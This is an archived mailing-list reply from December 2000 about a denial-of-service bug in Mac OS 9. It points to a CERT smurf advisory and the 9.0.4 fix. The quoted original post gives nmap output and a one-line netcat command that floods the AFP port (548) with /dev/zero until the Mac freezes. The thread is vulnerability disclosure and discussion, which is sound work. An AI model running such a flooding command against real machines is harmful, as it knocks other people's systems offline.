Vulnerability Development mailing list archives
Re: Apple Mac DoS
From: Ian Stoba <ian () BABCOCKBROWN COM>
Date: Thu, 14 Dec 2000 09:13:01 -0800
Mac OS 9.0 is subject to smurf amplification. Here's a link to the CERT advisory: http://www.cert.org/advisories/CA-98.01.smurf.html This is fixed in Mac OS 9.0.4. The update is freely available from Apple: http://asu.info.apple.com/swupdates.nsf/artnum/n11617 Also, I happened to buy a copy of Mac OS 9 off the shelf in a CompUSA store this week and noticed that the version on the install CD was 9.0.4. The Q wrote:
I have noticed some unusual behaviour with Mac OS 9 I am not a Mac user so I apologize if this is a known bug I have checked the archives and generally on the Net and can find no mention of this effect any way a bit of background... I was nmaping a mac (running os 9) to see if I could diagnose why a smb connection couldn't be established. Not being familiar with mac os (at all) I telnetted to the open ports and didn't get a lot. erm... then decided to try a netcat to each port.... (don't ask why) well to cut a long story short it causes a MASSIVE DoS on the mac if you net cat /dev/zero to port 548 tcp. The Machine needs a reset before it will respond. Surely this can't be right? the details - Ports open are testhost@testhost ]$ nmap 192.168.1.96 ## IP of a mac boxen Starting nmap V. 2.53 by fyodor () insecure org ( www.insecure.org/nmap/ ) Interesting ports on (192.168.1.96): (The 1521 ports scanned but not shown below are in state: closed) Port State Service 427/tcp open svrloc 548/tcp open afpovertcp Nmap run completed -- 1 IP address (1 host up) scanned in 8 seconds to cause the DoS testhost@testhost ]$./nc -v 192.168.1.96 548 < /dev/zero caused massive DoS - mouse nonfunctional (important on a mac :o) of course when you stop the netcat the mac returns to normal after 10-20 secs _____________________________________________________________________________________ Get more from the Web. FREE MSN Explorer download : http://explorer.msn.com
----------------------------------------- (on tiburon) This email message may contain information that is confidential and proprietary to Babcock & Brown or a third party. If you are not the intended recipient, please contact the sender and destroy the original and any copies of the original message. Any review, retransmission, dissemination or other use of, or taking any action in reliance upon, the information contained in this message by persons other than the intended recipient is prohibited. While Babcock & Brown has taken reasonable steps to do so, it does not represent, warrant and/or guarantee that the integrity of this communication has been maintained nor that the message is free of errors, viruses, interception or interference. Additional Legal Notices can be found at http://www.babcockbrown.com/email_disclaimer.html ---------------------------------------------------------
Current thread:
- Apple Mac DoS The Q (Dec 15)
- Re: Apple Mac DoS Jurriaan Kamer (Dec 15)
- Re: Apple Mac DoS Ian Stoba (Dec 15)
- Re: Apple Mac DoS Daniel J. Luke (Dec 15)
- Re: Apple Mac DoS Daniel Harrison (Dec 15)
- Re: Apple Mac DoS Martin Sunnerdahl (Dec 15)
- Re: Apple Mac DoS Ian Stoba (Dec 15)
- Re: Apple Mac DoS Daniel J. Luke (Dec 15)
- Re: Apple Mac DoS 3APA3A (Dec 15)
- Re: Apple Mac DoS Ian Stoba (Dec 15)
- <Possible follow-ups>
- Re: Apple Mac DoS Matteo,Marc A. (Dec 17)
- Re: Apple Mac DoS Daniel J. Luke (Dec 18)
- Re: Apple Mac DoS Matteo,Marc A. (Dec 18)
- Re: Apple Mac DoS Daniel J. Luke (Dec 18)
- Re: Apple Mac DoS Jurriaan Kamer (Dec 15)